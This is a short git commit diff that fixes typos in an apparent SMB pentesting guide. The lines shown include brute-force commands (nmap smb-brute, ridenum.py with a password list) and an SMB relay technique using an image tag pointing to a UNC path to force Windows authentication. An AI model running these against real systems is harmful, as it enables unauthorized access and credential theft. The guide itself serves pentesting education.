Fix some typos in pentesting smb
This commit is contained in:
parent
7207d134b9
commit
10015ab66a
@ -439,7 +439,7 @@ In **kali** it is located on /usr/share/doc/python3-impacket/examples/
|
||||
|
||||
```bash
|
||||
nmap --script smb-brute -p 445 <IP>
|
||||
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce eachusername
|
||||
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
|
||||
```
|
||||
|
||||
## SMB relay attack
|
||||
@ -451,7 +451,7 @@ This attack uses the Responder toolkit to **capture SMB authentication sessions*
|
||||
|
||||
The Windows library URLMon.dll automatically try to authenticaticate to the host when a page tries to access some contect via SMB, for example: `img src="\\10.10.10.10\path\image.jpg"`
|
||||
|
||||
This happens with the funcions:
|
||||
This happens with the functions:
|
||||
|
||||
* URLDownloadToFile
|
||||
* URLDownloadToCache
|
||||
|
Loading…
Reference in New Issue
Block a user